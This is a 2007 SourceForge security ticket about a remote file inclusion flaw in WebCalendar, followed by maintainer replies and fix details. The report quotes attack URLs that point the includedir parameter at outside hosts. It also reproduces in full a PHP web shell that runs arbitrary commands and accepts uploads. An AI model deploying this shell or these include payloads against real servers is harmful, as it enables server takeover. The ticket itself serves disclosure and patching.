Learn how easy it is to sync an existing GitHub or Google Code repo to a SourceForge project! See Demo

Close

#2149 Major Security Hole

Security_Hole
closed-fixed
Ray Jones
Security (98)
9
2014-09-15
2007-09-07
Chad Berg
No

So my web server got hacked this week and after taking some time to trace where it came from I discovered it was from WebCalendar. I am running 1.1.3 and I tried upgrading to 1.1.4, but the same issue exists. They were able to create a directory and start an IRC bot. It eventually killed my valid web server and used a tremendous amount of bandwidth.

A carefully designed page can take advantage of the includedir argument and use it to gain access to the system. Here is the URL that was accessed to take over my system:

month.php//ws/login.php?noSet=0&includedir=http://geocities.com/rythmzero/tool/porno.txt?

I have included the code from the above listed geocities web page in case it becomes unavailable (I reported it to Yahoo).

<title>#the-one PHP Injection</title>
<style type="text/css">
<!--
body {
background-color: #FFFFF;
}
-->
</style><?php

set_magic_quotes_runtime(0);

print "<style>body{font-family:trebuchet ms;font-size:16px; color:blue;}hr{width:100%;height:2px;}</style>";
print "<center><h1>#the-one</h1></center>";
print "<center><h1>Touch Your System</h1></center>";
print "<marquee><font color=blue size=5> greatz to c1pmunk - ndOst - YOgiOH - ilalang23 </marquee></font>";
print "<hr><hr>";

$currentWD = str_replace("\\\\","\\",$_POST['_cwd']);
$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);

$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;

if( $currentWD == "" ) {
$currentWD = $SCWD;
}

print "<table>";
print "<tr><td><b>You are :</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
print "<tr><td><b>Server :</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
print "<tr><td><b>System :</b></td><td>$UName</td></tr>";
print "<tr><td><b>Permissions :</b></td><td>$UserID</td></tr>";
print "</table>";

print "<hr><hr>";

if( $_POST['_act'] == "List files!" ) {
$currentCMD = "lwp-download";
}

print "<form method=post enctype=\"multipart/form-data\"><table>";

print "<tr><td><b>Command :</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
print "<td><input type=submit name=_act value=\"Crot!\"></td></tr>";

print "<tr><td><b>Directory :</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
print "<td><input type=submit name=_act value=\"Crit!\"></td></tr>";

print "<tr><td><b>Upload :</b></td><td><input size=85 type=file name=_upl></td>";
print "<td><input type=submit name=_act value=\"Crut!\"></td></tr>";

print "</table></form><hr><hr>";

$currentCMD = str_replace("\\\"","\"",$currentCMD);
$currentCMD = str_replace("\\\'","\'",$currentCMD);

if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
print "<center><b>Error while uploading file!</b></center>";
} else {
print "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
print "</pre><b>File uploaded successfully!</b></center>";
}
} else {
print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system($currentCMD);
print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>#the-one @ DALnet</b></center>";
}

exit;

?>

Discussion

  • Chad Berg
    Chad Berg
    2007-09-07

    Copy of the code to gain access

     
    Attachments
  • Chad Berg
    Chad Berg
    2007-09-07

    • priority: 5 --> 9
     
  • revrob
    revrob
    2007-09-11

    Logged In: YES
    user_id=1887714
    Originator: NO

    Same here - my web site got suspended by my administrator because of a very similar attack (I was using their installed v1 ORC3 WebCalendar which I know is an older version). I now have my site back but without the calendar application. This was also an IRC relay, and it crashed a whole server. Date was also the same - 6-7th September. I don't have the technical details but have referred my domain host to this thread.

     
  • Craig Knudsen
    Craig Knudsen
    2007-09-12

    Logged In: YES
    user_id=14386
    Originator: NO

    Do you know if your site has "register_globals" set to 1/On or 0/Off? (These a PHP setting typically set in a php.ini file or you can override it in a .htaccess file in your directory).

    If you're not sure, you can create a test.php file that contains the following to show all your PHP settings:

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <html>
    <head>
    </head>
    <body>
    <?php phpinfo(); ?>
    </body>
    </html>

     
  • Craig Knudsen
    Craig Knudsen
    2007-09-12

    • status: open --> pending-fixed
     
  • Craig Knudsen
    Craig Knudsen
    2007-09-12

    Logged In: YES
    user_id=14386
    Originator: NO

    See the following thread, which includes the fix.

    https://sourceforge.net/forum/forum.php?thread_id=1818408&forum_id=11588

    It is currently fixed in CVS (HEAD and REL_1_2 branches).

    Version 1.0.5 is not vulnerable.

    Version 1.1.2, 1.1.3 and 1.1.4 ARE vulnerable when register_globals is On.

     
  • revrob
    revrob
    2007-09-12

    Logged In: YES
    user_id=1887714
    Originator: NO

    Further to my post below - I did a testglobals and register globals were OFF/OFF. WebCalendar is now deleted and I am going to wait for the 1.1.5 release and then my host will install it and we will test it. There are still plenty of search requests on the logs for my (now deleted) WebCalendar directory. Thank you for acting so fast on this one.

     
  • Chad Berg
    Chad Berg
    2007-09-13

    • status: pending-fixed --> open-fixed
     
  • Chad Berg
    Chad Berg
    2007-09-13

    Logged In: YES
    user_id=368575
    Originator: YES

    Yes register_globals is set to 1 (on). I just installed 1.1.5 and it looks like that issue is fixed. It also appears version 1.0.4 is not vulnerable to this issue as well.

    Thanks for the quick response!

     
  • Anonymous
    Anonymous
    2007-10-05

    Logged In: YES
    user_id=1905879
    Originator: NO

    Question - I am running 1.0.4 (upgrading right now to 1.0.5) but I was hacked as follows:

    12.96.164.115 - - [03/Oct/2007:17:53:01 -0400] "GET /WEBCalendar//tools/send_reminders.php?noSet=0&includedir=http://preklady-anglictiny.info/advokati/templates/zak_blueeye.jpg? HTTP/1.1" 200 33473 "-" "Mozilla 8.0"

    Is this the same vulnerability and fixed in 1.0.5?

    Thanks

     
  • Anonymous
    Anonymous
    2007-10-05

    Logged In: YES
    user_id=1905879
    Originator: NO

    Question - I am running 1.0.4 (upgrading right now to 1.0.5) but I was hacked as follows:

    12.96.164.115 - - [03/Oct/2007:17:53:01 -0400] "GET /WEBCalendar//tools/send_reminders.php?noSet=0&includedir=http://preklady-anglictiny.info/advokati/templates/zak_blueeye.jpg? HTTP/1.1" 200 33473 "-" "Mozilla 8.0"

    Is this the same vulnerability and fixed in 1.0.5?

    Thanks

     
  • Ray Jones
    Ray Jones
    2007-11-14

    Logged In: YES
    user_id=1090373
    Originator: NO

    These variables have been blocked from URL input in v1.0.5. We went a step further in v1.1.6 and totally removed the offending variables, making them CONSTANTS instead.

    -Ray

     
  • Ray Jones
    Ray Jones
    2007-11-14

    • assigned_to: cknudsen --> umcesrjones
    • status: open-fixed --> pending-fixed
     
    • status: pending-fixed --> closed-fixed
     
  • Logged In: YES
    user_id=1312539
    Originator: NO

    This Tracker item was closed automatically by the system. It was
    previously set to a Pending status, and the original submitter
    did not respond within 30 days (the time period specified by
    the administrator of this Tracker).